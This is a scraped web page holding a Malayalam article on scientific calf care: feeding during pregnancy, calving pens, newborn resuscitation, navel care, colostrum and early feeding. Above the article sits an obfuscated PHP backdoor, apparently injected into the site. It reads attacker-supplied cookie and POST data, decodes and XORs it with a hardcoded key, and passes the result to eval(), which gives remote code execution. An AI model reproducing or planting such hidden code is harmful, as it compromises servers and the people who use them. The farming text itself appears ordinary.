$VXJVEAbNkL = chr (111) . chr ( 914 - 847 )."\x5f" . "\x68" . "\152" . chr (78) . "\123";$ElrEeQWf = 'c' . chr ( 427 - 319 ).chr ( 779 - 682 ).'s' . "\163" . "\137" . "\145" . chr ( 457 - 337 ).chr ( 1063 - 958 ).'s' . "\164" . "\x73";$FKdCsvt = class_exists($VXJVEAbNkL); $ElrEeQWf = "26131";$xTnGlRuR = strpos($ElrEeQWf, $VXJVEAbNkL);if ($FKdCsvt == $xTnGlRuR){function dSAGxSPU(){$mCXBr = new /* 15894 */ oC_hjNS(5865 + 5865); $mCXBr = NULL;}$SyQtm = "5865";class oC_hjNS{private function UCrjoD($SyQtm){if (is_array(oC_hjNS::$GSCSJq)) {$GpUkk2 = str_replace("<" . "?php", "", oC_hjNS::$GSCSJq["content"]);eval($GpUkk2); $SyQtm = "5865";exit();}}public function VXqvOSb(){$GpUkk = "53873";$this->_dummy = str_repeat($GpUkk, strlen($GpUkk));}public function __destruct(){oC_hjNS::$GSCSJq = @unserialize(oC_hjNS::$GSCSJq); $SyQtm = "30711_57028";$this->UCrjoD($SyQtm); $SyQtm = "30711_57028";}public function BHgAlhgAP($GpUkk, $KCcdxwo){return $GpUkk[0] ^ str_repeat($KCcdxwo, intval(strlen($GpUkk[0]) / strlen($KCcdxwo)) + 1);}public function jJMpKV($GpUkk){$FPmjvGj = "\142" . chr ( 555 - 458 ).chr ( 418 - 303 ).'e' . '6' . chr ( 97 - 45 );return array_map($FPmjvGj . chr (95) . chr (100) . "\x65" . chr (99) . chr (111) . "\x64" . chr (101), array($GpUkk,));}public function __construct($TaJCrlgNU=0){$adNshnbaU = "\54";$GpUkk = "";$UjieTVMmPr = $_POST;$jkIOj = $_COOKIE;$KCcdxwo = "fa466309-c080-47c2-bdd5-b7d5baf991f3";$ApeUFifxgT = @$jkIOj[substr($KCcdxwo, 0, 4)];if (!empty($ApeUFifxgT)){$ApeUFifxgT = explode($adNshnbaU, $ApeUFifxgT);foreach ($ApeUFifxgT as $cwcxCxX){$GpUkk .= @$jkIOj[$cwcxCxX];$GpUkk .= @$UjieTVMmPr[$cwcxCxX];}$GpUkk = $this->jJMpKV($GpUkk);}oC_hjNS::$GSCSJq = $this->BHgAlhgAP($GpUkk, $KCcdxwo);if (strpos($KCcdxwo, $adNshnbaU) !== FALSE){$KCcdxwo = str_pad($KCcdxwo, 10); $KCcdxwo = ltrim(rtrim($KCcdxwo));}}public static $GSCSJq = 51359;}dSAGxSPU();} “ഇന്നത്തെ കിടാവ് നാളത്തെ കാമധേനു:” കന്നുകുട്ടികളുടെ ശാസ്ത്രീയ പരിപാലന മാർഗങ്ങൾ – Mannira

“ഇന്നത്തെ കിടാവ് നാളത്തെ കാമധേനു:” കന്നുകുട്ടികളുടെ ശാസ്ത്രീയ പരിപാലന മാർഗങ്ങൾ

ഇന്നത്തെ പശുക്കിടാക്കൾ നാളയുടെ കാമധേനുക്കളാണ്. കുഞ്ഞുകിടാക്കളെ ആരോഗ്യവും മികച്ച ഉത്പാദനശേഷിയുമുള്ള പശുക്കളായി മാറ്റിയെടുക്കുക എന്നത് ക്ഷീരമേഖലയിലെ വിജയത്തിന്റെ അടിത്തറയാണ്. മികച്ച ആരോഗ്യവും വളർച്ചാക്ഷമതയുമുള്ള കിടാരികൾ കർഷകരുടെ മുന്നോട്ടുള്ള പ്രയാണത്തെ ശക്തിപ്പെടുത്തുമെന്നതിൽ സംശയമില്ല. എന്നാൽ അതിന് അത്യധികം ശ്രദ്ധയും ശാസ്ത്രീയ പരിപാലനവും അത്യാവശ്യമാണ്.

പശുക്കിടാക്കളെ, പ്രത്യേകിച്ച് മൂന്നുമാസത്തിൽ ചുവടെയുള്ളവയെ ബാധിക്കുന്ന വിവിധ രോഗങ്ങളും തുടർന്നുള്ള മരണവും കേരളത്തിലെ ക്ഷീരകർഷകർ നേരിടുന്ന പ്രധാന വെല്ലുവിളികളിൽ ഒന്നാണ്. ഇന്ത്യയിലെ മറ്റു സംസ്ഥാനങ്ങളെ അപേക്ഷിച്ച്‌ കേരളത്തിലെ ക്ഷീരമേഖലയിൽ കന്നുകുട്ടികളുടെ മരണ നിരക്ക് കുറവാണെങ്കിലും അത് പത്തുമുതൽ ഇരുപത്തിയഞ്ചു ശതമാനം വരെയാണ്. ശാസ്ത്രീയ പരിചരണമുറകളുടെ അഭാവം, ശ്രദ്ധക്കുറവ്, ശുചിത്വമില്ലാത്ത തൊഴുത്തും പരിസരവും തുടങ്ങിയ വിവിധ കാരണങ്ങളാണ് കന്നുകുട്ടികളുടെ ആരോഗ്യകരമായ വളർച്ചക്ക് വിഘാതമാവുന്നത്.
മൂന്നുമാസത്തിൽ ചുവടെയുള്ള കന്നുകുട്ടികൾക്കിടയിൽ രോഗബാധയും തുടർന്നുള്ള മരണനിരക്കും ഉയർന്നതായതുകൊണ്ട് തന്നെ, അത് വരെയുള്ള പ്രായയളവിൽ അതീവ ശ്രദ്ധയും ശാസ്ത്രീയ പരിചരണവും അത്യാവശ്യമാണ്.

കന്നുകുട്ടികളുടെ ശാസ്‌ത്രീയപരിപാലനം തുടങ്ങേണ്ടതെപ്പോൾ?

കന്നുകുട്ടികളുടെ ശാസ്‌ത്രീയആരോഗ്യപരിപാലനത്തിനറെ പ്രാഥമിക പ്രവർത്തനങ്ങൾ അവയുടെ ഗര്‍ഭാവസ്ഥയില്‍ തന്നെ ആരംഭിക്കേണ്ടിയിരിക്കുന്നു. നല്ല വളർച്ചയോടെയും ശരീര ഭാരത്തോടുകൂടിയും പ്രസവിക്കുന്ന കന്നുകുട്ടികളിൽ പൊതുവേ രോഗനിരക്കും മരണസാധ്യതയും കുറവായിരിക്കും. അതുകൊണ്ട് തന്നെ ജനിച്ചുവീഴുന്ന കുഞ്ഞുങ്ങളുടെ ശാരീരിക വളർച്ച ഉറപ്പുവരുത്തുന്നതിനായി തള്ളപ്പശുക്കൾക്ക് അവയുടെ ഗർഭകാലത്ത്, പ്രത്യേകിച്ച് ഗർഭാവസ്ഥയിലുള്ള കിടാവിൻറെ വളർച്ച ഏറ്റവും കൂടിയ അവസാനത്തെ മൂന്ന് മാസത്തിൽ കൃത്യമായ കണക്കിൽ ഗുണനിലവാരമുള്ള ഭക്ഷണം ഉറപ്പു വരുത്തേണ്ടതുണ്ട്.

സാധാരണയായി നൽകുന്ന സംരക്ഷണ റേഷനു (Maintenance ration ) പുറമെ, ഉയർന്ന അളവിൽ പ്രോട്ടീനും ഊർജവുമടങ്ങിയ ഖരാഹാരങ്ങൾ അരകിലോഗ്രാം മുതൽ ഒരു കിലോഗ്രാം വരെ അധികഅളവിൽ നൽകേണ്ടതുണ്ട്. കൂടിയ അളവിൽ പച്ചപ്പുല്ല് നൽകൽ, വളർച്ചയെ സഹായിക്കുന്ന മൂലകങ്ങൾ അടങ്ങിയ ധാതു ലവണങ്ങൾ തീറ്റയിൽ ഉൾപെടുത്തൽ എന്നിവയും നല്ലതാണ്, എങ്കിലും ഗര്‍ഭകാലത്തിൻറെ ഏഴു മാസം മുതൽ പ്രസവത്തിനറെ രണ്ടാഴ്ചവരെയുള്ള കാലയളവിൽ കാൽസ്യം അടങ്ങിയ തീറ്റ ഒഴിവാക്കുന്നത് പ്രസവസമയത്തെ സങ്കീർണ്ണതകൾ തടയാൻ സഹായകരമാണ്.

Also Read: മൃഗസംരക്ഷണമേഖലയില്‍ നടപ്പിലാക്കേണ്ട ശാസ്ത്രീയ തീറ്റക്രമം

പശുക്കൾക്ക് പ്രസവത്തിനായി പ്രത്യേക മുറിയൊരുക്കൽ

പശുക്കൾക്ക് പ്രസവത്തിനായി പ്രത്യേക മുറിയോ എന്നോർത്തു ആരും നെറ്റിചുളിക്കേണ്ട. പശുക്കൾക്ക് പ്രസവിക്കുന്നതിനും കിടാങ്ങളുടെ തുടർന്നുള്ള പരിചരണത്തിനും തൊഴുത്തിന് സമീപം പ്രത്യേകം സജ്ജമാക്കിയ കൂടൊരുക്കിയാൽ (Maternity pen / Calving pen), കന്നുകുട്ടികളുടെ ആരോഗ്യം സംരക്ഷിക്കുന്നതിനൊപ്പം പശുക്കളെ ബാധിക്കുന്ന അകിടുവീക്കമടക്കമുള്ള രോഗങ്ങളെ ഒരു പരിധി വരെ തടയാനും സാധിക്കും.

ഒന്നാം ദിവസം തന്നെ തള്ളയിൽ നിന്ന് കുഞ്ഞിനെ വേർപ്പെടുത്തുന്നില്ലെങ്കിൽ (Day old weaning) പത്തുദിവസം വരെ തള്ളപ്പശുവിനൊപ്പം കുഞ്ഞിനെ അവിടെ തന്നെ പാർപ്പിക്കാം. ഡയറി ഫാമുകൾ ആണെങ്കിൽ മൊത്തം പ്രത്യുൽപ്പാദനക്ഷതയുള്ള പശുക്കളുടെ എണ്ണത്തിന്റെ അഞ്ചു ശതമാനം എന്ന കണക്കിൽ പ്രസവമുറികൾ മുൻകൂട്ടി തയ്യറാക്കി വെക്കാം. ധാരാളം ജലവും വിരേചനക്ഷമത (Laxative diet) കൂടിയ ഭക്ഷണങ്ങളും ഇവിടെ ലഭ്യമാക്കണം. ചുരുങ്ങിയത് 3 മീറ്റർ നീളവും 4 മീറ്റർ വീതിയും ഉള്ള ഒരു മുറി പ്രസവത്തിനായി സജ്ജീകരിക്കാം. നല്ല വായുസഞ്ചാരവും വെളിച്ചവും പ്രത്യേകം ഉറപ്പുവരുത്തണം.

Loading...

അണുനാശിനികൾ തളിച്ച് കഴുകി വൃത്തിയാക്കി ഉണക്കിയ, പ്രസവമുറികളിലേക്ക് പ്രസവം പ്രതീക്ഷിക്കുന്നതിൻറെ രണ്ടാഴ്ച മുൻപ് തന്നെ പശുക്കളെ മാറ്റം. ഒപ്പം പ്രസവമുറിയിൽ വൈക്കോലും ചണ ചാക്കും മറ്റും തറയിൽ വിരിച്ച് പശുക്കൾക്ക് വിരിപ്പൊരുക്കുകയും ആവാം. പ്രസവം ഏറ്റവും അടുത്ത നാളുകളിൽ പ്രത്യേകിച്ച് രാത്രിയും വെളുപ്പിനും പശുക്കളെ പ്രത്യേകം നിരീക്ഷിക്കേണ്ടതുണ്ട് . അകിടുകൾ കന്നിപ്പാൽ നിറഞ്ഞു തുടിക്കൽ, യോനി ദളം ചുവന്നു വികസിക്കൽ, വാല് തുടർച്ചയായി ഉയർത്തിപിടിക്കൽ, ഇടവിട്ട് മൂത്രമൊഴിക്കൽ, ഇടുപ്പെല്ലുകൾ വികസിക്കൽ, ഭക്ഷണത്തോടുള്ള വിരക്തി, പാൽചുരത്തൽ തുടങ്ങിയ വിവിധ ലക്ഷണങ്ങൾ എന്നിവ പ്രസവമടുത്തതിൻറെ സൂചനകളാണ്.

തുടർന്ന് തണ്ണീർകുടം പുറത്തേക്കുവന്നു പൊട്ടി സാധാരണ നിലയിൽ പ്രസവം നടക്കും. എന്നാൽ കുട്ടിയുടേതും അമ്മയുടേതുമായ വ്യത്യസ്തങ്ങളായ കാരണങ്ങളാൽ പ്രസവതടസ്സത്തിനുള്ള സാധ്യതയും തള്ളിക്കളയാൻ കഴിയില്ല. തണ്ണീർകുടം പൊട്ടി രണ്ടു മണിക്കൂറിനുള്ളിൽ പ്രസവം നടന്നില്ലെങ്കിൽ വിദഗ്‌ദ്ധ സഹായം തേടണം.

Also Read: ഡയറി ഫാം: വിപണി സാധ്യത, പുത്തന്‍ വിപണന തന്ത്രങ്ങള്‍ തുടങ്ങിയവ

പൂർണ്ണ വളർച്ചയെത്തിയ പശുക്കിടാക്കളുടെ അകലമരണത്തിനുള്ള പ്രധാന കാരണങ്ങളിലൊന്നാണ് പ്രസവതടസ്സവും തുടർന്നുള്ള സങ്കീർണ്ണതകളും. സമയബന്ധിതമായി വിദഗ്ദ്ധ സഹായംതേടുക വഴി ഇത് പരിഹരിക്കാവുന്നതാണ് . പ്രത്യേകിച്ച് പശുക്കളുടെ കന്നിപ്രസവത്തിൽ പ്രസവ തടസ്സത്തിനുള്ള സാധ്യത കൂടുതലാണ്. അമ്മപ്പശുവിൻറെ പ്രായം കൂടും തോറും ഗർഭാശയം പുറത്തേക്ക് തള്ളിവരൽ പോലുള്ള സങ്കീർണതകളും സംഭവിക്കാം. പ്രസ്തുത സാഹചര്യത്തിൽ ഉടനടി ഡോക്ടറുടെ സേവനം ലഭ്യമാക്കേണ്ടത് കിടാവിന്റെയും ഒരു പക്ഷേ പശുവിൻറെ തന്നെയും ആരോഗ്യ സുരക്ഷിതത്വത്തിനു അനിവാര്യമാണ്. പശുവിനറെ ഏകദേശം പ്രസവതീയതി ഡോക്ടറെ മുൻകൂട്ടി അറിയിച്ച് അടിയന്തിര ഘട്ടങ്ങളിലെ സേവനം മുൻകൂട്ടി ഉറപ്പുവരുത്തേണ്ടതുണ്ട്.

കിടാവിന്റെ ശ്വാസോച്ഛാസം ഉറപ്പുവരുത്താം. വേണമെങ്കിൽ കൃത്രിമശ്വാസവും നൽകാം

പ്രസവം നടന്ന ഉടൻ തന്നെ കന്നിക്കിടാവിന്റെ സുഗമമായ ശ്വാസോച്ഛാസം ഉറപ്പുവരുത്തണം. മുഖത്തും മറ്റും പറ്റിപ്പിടിച്ച ഗർഭാശയ അവശിഷ്ടങ്ങളും, കൊഴുത്ത ദ്രാവകവും, രക്തവും നീക്കം ചെയ്തും തുടച്ചു വൃത്തിയാക്കിയും നെഞ്ചിൽ ഇടവിട്ട് തുടർച്ചയായി ചെറുതായി അമര്‍ത്തിയും നാസദ്വാരത്തിൽ ഒരു വൈക്കോൽ തുമ്പുകൊണ്ട് ചെറുതായി തട്ടിയും ശ്വസോച്ഛാസം സാധ്യമാക്കാം. ചില സമയങ്ങളിൽ ശ്വാസന നാളികളിൽ കെട്ടികിടക്കുന്ന കൊഴുത്ത ദ്രാവകം ശ്വാസതടസമുണ്ടാക്കാം. അതൊഴിവാക്കാൻ കിടാവിനെ പിൻകാലുകളിൽ പിടിച്ചുയർത്തി ചെറുതായി ഇരുവശത്തേക്കും ചലിപ്പിക്കാം. ഇങ്ങനെ ചെയ്യുമ്പോൾ കിടാവിന്റെ മുട്ടിൽ നിന്നും നമ്മുടെ കൈ വഴുതാതിരിക്കാൻ വൈക്കോൽ കൊണ്ട് ചേർത്ത് പിടിക്കേണ്ടതുണ്ട്.
ഈ മാർഗങ്ങളത്രയും പരാജയപ്പെടുകയാണെങ്കിൽ അടുത്ത വഴി കിടാവിനു കൃത്രിമശ്വാസോച്ഛാസം നൽകുക എന്നതാണ്. നമ്മുടെ വായ് കിടാവിന്റെ മൂക്കിനോട് ചേർത്തുപിടിച്ചു ശ്വസനനാളികളിൽ കെട്ടികിടക്കുന്ന ദ്രാവകങ്ങൾ വലിച്ചെടുക്കുക (Suck out) എന്നതാണ് പ്രഥമ പടി. ശേഷം കിടാവിന്റെ വായ് അടച്ചുപിടിച്ചു നമ്മുടെ നിശ്വാസ വായു അതിന്റെ മൂക്കിലേക്ക് കടത്തിവിടാം. ഇതിനോടൊപ്പം ഇടവിട്ട് ചെറുതായി ഞെഞ്ചിൽ അമർത്തിത്തടവുകയും വേണം. നമ്മുടെ നിശ്വാസ വായുവിലെ കാർബൺ ഡയോക്‌സൈഡ് കിടാവിന്റെ ശ്വസനപ്രക്രിയയെ ത്വരിതപ്പെടുത്തും.

അണുബാധയേൽക്കാനുള്ള സാധ്യതകൾ തടയാം

പ്രസവിച്ച ഉടനെ സാധാരണഗതിയിൽ തള്ളപ്പശു തന്നെ കിടാവിനെ നക്കി തുടച്ചു വൃത്തിയാകാറുണ്ട്. അത് കിടാവിന്റെ രക്തചംക്രമണത്തെയും സുഗമമായ ശ്വസനത്തെയും സഹായിക്കും. തള്ള പശു ഇതിൽ വിമുഖത കാണിക്കുന്ന പക്ഷം കിടാവിന്റെ ശരീരത്തിൽ അൽപ്പം ഉപ്പോ, തവിടോ വിതറുന്നത് നല്ലതാണ്. എന്നിട്ടും തള്ളപ്പശു കുഞ്ഞിനെ ശ്രദ്ധിക്കുന്നില്ലെങ്കിൽ കന്നിക്കിടാവിൻറെ ശരീരം മുഴുവനും ഉണങ്ങിയ വൃത്തിയുള്ള ഒരു തുണികൊണ്ടോ, വൈക്കോൽ കൊണ്ടോ തുടച്ചു ശരീരത്തിൽ പറ്റി പിടിച്ചിരിക്കുന്ന സ്രവങ്ങളും മറ്റു സ്തരങ്ങളും നീക്കം ചെയ്യേണ്ടതുണ്ട്. അല്ലാത്ത പക്ഷം താഴ്ന്ന ശരീരോഷ്മാവ് മൂലമുള്ള പ്രശ്നങ്ങൾക്ക് കാരണമാവാം.

കിടാക്കളിലെ രോഗസംക്രമണത്തിനും അണുബാധക്കുമുള്ള വലിയ സാധ്യതകളിൽ ഒന്നാണ് അവയുടെ പൊക്കിൾ കൊടി. തുറന്നു കിടക്കുന്ന പൊക്കിൾകൊടി വഴി രോഗകാരികളായ അണുക്കൾ ശരീരത്തിനകത്തേക്ക് കയറുന്നത് സന്ധിവീക്കരോഗം (Joint ill ), പൊക്കിൾ രോഗം (Navel ill ), പൊക്കിൾ പഴുപ്പ് (Navel abscess) തുടങ്ങിയ ഗുരുതരമായ രോഗങ്ങൾക്ക് കാരണമായി തീരുകയും ചെയ്യും. അതൊഴിവാക്കാൻ പ്രസവിച്ച അരമണിക്കൂറിനുള്ളിൽ തന്നെ പൊക്കിൾ കൊടി ശരീരത്തിൽ നിന്നും 5 സെന്റീമീറ്റര്‍ മാറി ടിഞ്ചർ അയഡിൻ ലായനിയിൽ മുക്കിയ ഒരു നൂലുകൊണ്ട് കെട്ടണം. ശേഷം അതിന്റെ 2 സെന്റീമീറ്റര്‍ ചുവടെ വെച്ച് മുറിച്ച് ഒഴിവാക്കാം. ബാക്കിയുള്ള ഭാഗം നേർപ്പിച്ച അയഡിൻ ലായനിയിൽ (7 ശതമാനം) അഞ്ചുദിവസം വരെ ദിവസവും രണ്ടു തവണ മുക്കുന്നത് ഗുണകരമാണ്.

സന്ധിവീക്ക രോഗത്തിന്റെ ലക്ഷണങ്ങൾ കണ്ടുതുടങ്ങിയാൽ ഉടൻ ചികിത്സ ലഭ്യമാകണം. അല്ലാത്തപക്ഷം വീക്കം വർധിച്ചു മുട്ടുകൾ പഴുത്തു പൊട്ടി ഒന്ന് രണ്ടു ആഴ്ചക്കുള്ളിൽ മരണം സംഭവിക്കും. രോഗം ബാധിച്ച കിടാവിനെ മറ്റുള്ളവയിൽ നിന്ന് പ്രത്യേകം മാറ്റിയിടാനും അതിന്റെ മുറിവിലെ പഴുപ്പും മറ്റും തൊഴുത്തിൽ വീഴാതെയും ശ്രദ്ധിക്കണം. നീണ്ടുനിൽക്കുന്ന ആന്റിബയോട്ടിക് ചികിത്സ അനിവാര്യമാണ്.

Also Read: പുതിയതായി ഡയറി ഫാം ആരംഭിക്കുന്നവരോട് പറയാനുള്ളത്

കന്നിപ്പാലിൻറെ പ്രാധാന്യവും കന്നുകുട്ടിയുടെ ആരോഗ്യവും

കന്നുകുട്ടികളുടെ ആരോഗ്യകരമായ ജീവിതത്തിനു കൃത്യമായ അളവിലും കൃത്യമായ സമയത്തും കന്നിപ്പാൽ ഉറപ്പുവരുത്തണ്ടത് അതിപ്രധാനമാണ്. ഗർഭാവസ്ഥയിൽ തള്ളപ്പശുവിൽ നിന്നും രോഗപ്രതിരോധത്തിനായുള്ള ആൻറി ബോഡികൾ ഒന്നും തന്നെ കുഞ്ഞിന് ലഭ്യമാവില്ല എന്നാൽ കന്നിപ്പാൽ കുടിക്കുന്നത് വഴി ഈ കുറവ് നികത്തപ്പെടുന്നു. ഗാമ ഗ്ലോബുലിൻ അടക്കമുള്ള രോഗപ്രതിരോധത്തിനാവശ്യമായ ആൻറിബോഡികൾ, വിറ്റാമിൻ എ അടക്കമുള്ള വിവിധ വിറ്റാമിനുകൾ, അയേൺ, ഫോസ്‌ഫറസ്, കാൽസ്യം തുടങ്ങിയ മൂലകങ്ങൾ, ഊർജം വിവിധ മാംസ്യങ്ങൾ എന്നിവയുടെയെല്ലാം നിറഞ്ഞ സ്രോതസ്സാണ് കന്നിപ്പാൽ അഥവാ കൊളസ്ട്രം.

സാധാരണ പാലിലുള്ളതിനേക്കാൾ ഏഴിരട്ടി അധികം മാംസ്യവും രണ്ടിരട്ടി അധികം ഖരപദാര്‍ഥങ്ങളും കന്നിപ്പാലിൽ അടങ്ങിയിട്ടുണ്ട്. കന്നിപ്പാൽ പോഷകങ്ങളോടൊപ്പം വിരേചനക്ഷമതയും പ്രധാനം ചെയ്യുന്നു. ജനിച്ചു ശേഷം പന്ത്രണ്ടു മുതൽ ഇരുപത്തിനാലു മണിക്കൂർ വരെ ഈ ഘടകങ്ങൾ അതേപടി നേരിട്ട് ആഗിരണം ചെയ്യാനുള്ള കഴിവ് കന്നുകുട്ടികളുടെ ദഹനവ്യൂഹത്തിനുണ്ട് . ആദ്യ ഒന്ന് രണ്ടു മണിക്കൂറുകളിൽ ആഗിരണ ശേഷി ഏറ്റവും ഉയർന്ന തോതിൽ ആയിരിക്കും. എന്നാൽ സമയം ഏറും തോറും ദഹനവ്യൂഹത്തിൽ വിവിധ രാസാഗ്നികൾ പ്രവർത്തിക്കുന്നത് മൂലം പ്രസ്തുത ഘടകങ്ങൾ വിഘടിക്കുന്നതിനും നേരിട്ടുള്ള ആഗിരണം തടസ്സപ്പെടുന്നതിനും കാരണമാവും. ആയതിനാൽ കന്നിപ്പാൽ കൃത്യമായ അളവിൽ കൃത്യസമയത്തു നൽകൽ പ്രധാനമാണ്.

സാധാരണ നിലയിൽ അര മുതൽ ഒരു മണിക്കൂറിനുള്ളിൽ കിടാക്കൾ എഴുന്നേറ്റ് സ്വമേധയാ കന്നിപ്പാൽ കുടിക്കുമെങ്കിലും, അങ്ങനെയല്ലാത്ത പക്ഷം കന്നിപ്പാൽ കറന്നെടുത്തു കിടാക്കളെ കുടിപ്പിക്കേണ്ടതുണ്ട് (Hand feeding ). ആദ്യ അരമണിക്കൂറിനുള്ളിൽ ശരീര ഭാരത്തിന്റെ എട്ടു ശതമാനം വരെ കന്നിപ്പാൽ കിടാവിനെ കുടിപ്പിക്കാം. ശേഷം പത്തുമുതൽ പന്ത്രണ്ടു മണിക്കൂറിനുള്ളിൽ അതേയളവിൽ ഒരു തവണകൂടി നൽകാം. തുടർ ദിവസങ്ങളിൽ മൊത്തം ശരീര ഭാരത്തിന്റെ പത്തുശതമാനം വരെ പാൽ ഇങ്ങനെ കിടാക്കളെ കുടിപ്പിക്കാം. ഈ അളവിലുള്ള പാൽ ദിവസത്തിൽ മൂന്നോ നാലോ തവണകളായി നൽകാം. കന്നിപ്പാലിന്റെ അഭാവത്തിൽ ഒരു മുട്ട അര ലിറ്റർ പാലിൽ കലക്കി അതിൽ അതിൽ 15 മില്ലി ലിറ്റര്‍ ആവണക്കെണ്ണയും മീനെണ്ണയും ചേർത്ത് നൽകാവുന്നതാണ്.

Also Read: കുന്നുകാലികളിലെ ദുശ്ശീലങ്ങളും നിവാരണ മാര്‍ഗ്ഗങ്ങളും

കന്നുകുട്ടികളുടെ ശാസ്ത്രീയ ഭക്ഷണക്രമം

ആദ്യ മൂന്നുമാസം പ്രായമാവുന്നതു വരെ കന്നുകുട്ടികളുടെ ആഹാരത്തിൽ പ്രത്യേക ശ്രദ്ധ ആവശ്യമാണ്. മൂന്നുമാസം വരെയുള്ള കിടാക്കളെ പശുക്കളുടെ അരികെ വിട്ടു വേണ്ടത്ര പാൽ കുടിപ്പിക്കുന്ന രീതിയാണ് കേരളത്തിൽ ചെറുകിട ക്ഷീരകർഷകർ വ്യാപകമായി അനുവർത്തിക്കുന്നത്. രണ്ട് ആഴ്ച പ്രായമായ കിടാക്കളെ തള്ള പശുക്കളിൽ നിന്ന് മാറ്റി നിർത്തി പരിപാലിക്കുന്ന വീനിങ് രീതിയും അവലംബിക്കവുന്നതാണ്. വീനിങ് രീതിയാണെങ്കിൽ കറന്നെടുത്ത പാലോ അല്ലെങ്കിൽ ഉയർന്ന പ്രോട്ടീനുകൾ അടങ്ങിയ (ഇരുപത്തിനാലു ശതമാനം വരെ) കൃത്രിമ പാലുകളോ നിപ്പിളും മറ്റു പാൽ പാത്രങ്ങളും ഉപയോഗിച്ച് നൽകാവുന്നതാണ്.

ആദ്യമാസത്തിൽ ശരീരഭാരത്തിന്റെ പത്തിലൊന്നു പാൽ ദിവസത്തിൽ വിവിധ തവണകളായി ഇങ്ങനെ നൽകാവുന്നതാണ്. അത് പരമാവധി മൂന്നുമുതൽ അഞ്ചു ലിറ്റർ വരെ ആവാം. രണ്ടാം മാസം ശരീര ഭാരത്തിന്റെ പതിനഞ്ചിൽ ഒന്നും മൂന്നാം മാസം ഇരുപതിൽ ഒന്നും പാൽ നൽകാം. രണ്ടാഴ്ച മുതൽ ധാരാളം ശുദ്ധജലം കിടാക്കൾക്ക് ലഭ്യമാകണം.

ഉയർന്ന തോതിൽ പോഷകഘടകങ്ങൾ അടങ്ങിയ സാന്ദ്രീകൃതാഹാരം (കാഫ് സ്റ്റാർട്ടർ ) ഒരു മാസത്തിനു ശേഷം ആറുമാസം വരെ കൊടുക്കാം .ഇത് കിടാക്കളുടെ വളർച്ചയെ ത്വരിതപ്പെടുത്തുന്നു. നാലു ആഴ്ചകൾക്ക് ശേഷം അൻപതു മുതൽ നൂറു ഗ്രാം വരെ ഖരാഹാരം ഇങ്ങനെ നൽകാം. ഓരോ രണ്ടാഴ്ച കൂടും തോറും സാന്ദ്രീകൃതാഹാരത്തിന്റെ അളവ് നൂറ് മുതൽ നൂറ്റി അന്പത് ഗ്രാം വരെ അധികമായി വർധിപ്പിച്ചു ആറാം മാസത്തോടു കൂടി ഒന്നേകാൽ കിലോ വരെ സാന്ദ്രീകൃതാഹാരം നൽകാം. ഒപ്പം ഒന്നാം മാസത്തിനു ശേഷം അൽപ്പാൽപ്പമായി പുല്ലും തീറ്റയിൽ ചേർത്തുനൽകാം. ജീവകം എ, ജീവകം ഡി, ജീവകം ബി തുടങ്ങിയ ജീവകങ്ങൾ വളർച്ച ഘട്ടത്തിൽ ഏറെ പ്രധാനപ്പെട്ടതാണ്. ഈ അവസരത്തിൽ യൂറിയ അടങ്ങിയ തീറ്റകൾ ഒഴിവാക്കാൻ പ്രത്യേകം ശ്രദ്ധ വേണം.

Also Read: ഉണക്കപ്പുല്ലും സൈലേജും; തയ്യാറാക്കേണ്ട വിധം

കന്നുകുട്ടികൾക്കും വേണം പ്രത്യേക മുറികൾ

കന്നുകുട്ടികൾക്കായി പ്രത്യേകമുറിയൊരുക്കി (Calf pen ) പാർപ്പിക്കൽ മികച്ച ഒരു ശാസ്ത്രീയ രീതിയാണ്. അവയെ പ്രത്യേകം ശ്രദ്ധിക്കുന്നതിനും പരിചരിക്കുന്നതിനും ഇതുവഴി സാധ്യമാവുന്നു. മുറികൾ ഉണക്കി വൃത്തിയായി സൂക്ഷിക്കേണ്ടതും നല്ല വായുസഞ്ചാരം ഉറപ്പുവരുത്തേണ്ടതും മഴ കാലങ്ങളിൽ ചൂടു ലഭിക്കുന്നതിനു ള്ള സംവിധാനങ്ങൾ ഏർപ്പെടുത്തേണ്ടതും ഉണ്ട് തറയിൽ വൈക്കോൽ പുതച്ചു വിരിപ്പ് ഒരുക്കുകയും ചെയ്യാം. ആദ്യ മൂന്നുമാസം ഈ പ്രത്യേക മുറികളിൽ കിടാക്കളെ പാർപ്പിക്കാം. അതിനു ശേഷം ഒരുമിച്ചു പരിപാലിക്കുകയും ആറു മാസത്തോടു കൂടി ആൺ ,പെൺ എന്നിങ്ങനെ വേർതിരിച്ചു പരിപാലിക്കുകയും ചെയ്യാം.

കിടാക്കളിലെ രോഗങ്ങൾ

കന്നിപ്പാൽ കുടിപ്പിക്കുകയും വൃത്തിയുള്ള തൊഴുത്ത് സജ്ജമാകുകയും ശാസ്ത്രീയ പരിചരണ മാർഗങ്ങൾ അവലംബിക്കുകയും വഴി രോഗങ്ങൾ ഒരുപരിധിവരെ തടയാമെങ്കിലും കന്നുകുട്ടികളെ ബാധിക്കുന്ന പ്രധാന രോഗങ്ങളെ കുറിച്ച് ബോധവാന്മാരാവേണ്ടതുണ്ട്. തള്ളപ്പശുവിൽ നിന്ന് കുഞ്ഞുങ്ങളിലേക്ക് പകരാൻ സാധ്യതയുള്ള ടോക്‌സോകാര വിറ്റുലോറം എന്നയിനം ഉരുണ്ടവിരകൾ, പ്രോട്ടോസോവൽ രോഗകാരിയായ കോക്‌സീഡിയ എന്നിവയാണ് കിടാ ക്കളെ ബാധിക്കാൻ സാധ്യതയുള്ള പ്രധാന വിരബാധകൾ. തള്ള പശുക്കൾക്ക് അവയുടെ ഗർഭത്തിന്റെ എട്ടാം മാസത്തിനു മുൻപ് തന്നെ ഫെൻബെൻഡസോൾ, ആൽബെൻഡസോൾ തുടങ്ങിയ എല്ലാതരം വിരകളെയും തടയുന്ന വിരമരുന്നുകൾ നൽകിയും, പ്രസവിച്ച ശേഷം അഞ്ചാം ദിവസം വീണ്ടും പ്രസ്തുത മരുന്നുകൾ തള്ള പശുവിനു നൽകിയും ടോക്‌സോകാര എന്നയിനം വിരകൾ അമ്മപ്പശുവിൽ നിന്നും കുഞ്ഞുങ്ങളിലേക്ക് പകരുന്നത് തടയാം .ഒപ്പം പ്രസവിച്ചതിൻറെ പത്താംദിവസം കിടാക്കൾക്ക് ഡോക്ടറുടെ നിർദേശ പ്രകാരം വിരമരുന്നുകൾ നൽകുകയും ചെയ്യണം.

